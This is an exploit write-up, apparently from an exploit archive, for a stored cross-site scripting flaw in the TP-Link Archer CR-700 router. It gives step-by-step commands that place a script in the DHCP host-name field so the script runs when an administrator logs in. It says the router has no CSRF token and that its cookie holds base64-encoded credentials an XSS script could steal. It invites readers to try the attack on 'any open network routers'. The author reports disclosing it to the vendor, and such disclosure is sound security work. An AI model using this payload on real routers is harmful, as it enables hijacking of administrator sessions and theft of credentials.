# Exploit Title: TP-Link Archer CR-700 XSS vulnerability
# Google Dork: N/A
# Date: 09/07/2016
# Exploit Author: Ayushman Dutta
# Vendor Homepage: http://www.tp-link.us/
# Software Link: N/A
# Version: 1.0.6 (REQUIRED)
# Tested on: Linux
# CVE : N/A
#Exploit Information:
https://github.com/ayushman4/TP-Link-Archer-CR-700-XSS-Exploit/blob/master/README.md
TP-Link-Archer-CR-700-XSS-Exploit
Exploiting TP-Link Archer CR-700 Router. (Responsibly Disclosed to TP-Link)
Step 1-> On you linux machine (Kali or Ubuntu) type the following command
gedit /etc/dhcp/dhclient.conf
Comment out the line below
send host-name = gethostname();
Copy it to the line below it and change the gethostname() function to an XSS script like below.
send host-name = "<script>alert(5)</script>";
Step 2:Restart your linux system so that the changes takes into effect.
Step 3: Send a DHCP request to the router to receive an IP address with the command below.(Try this on any open network routers which is using TP-Link Archer CR-700)
dhclient -v -i wlan0
On running the command above, it send a DHCP request to the router. On a DHCP request, the host name is sent to which we have forcibly set it to an XSS script <script>alert(5)</script>
Step 4: Login to the administrator console.
On logging in the Script executes.
One more issue that I saw in the router that was that there was no CSRF token. The cookie set by the router contains a base64 encoded username & password whcih can be stolen using an XSS script.
Note:All The above information has been disclosed to TP-Link, who have reporduced the problem and passed it to their R&D team to fix the issue.
A URL to the product https://www.amazon.com/Wireless-Certified-Cablevision-Archer-CR700/dp/B012I96J3W
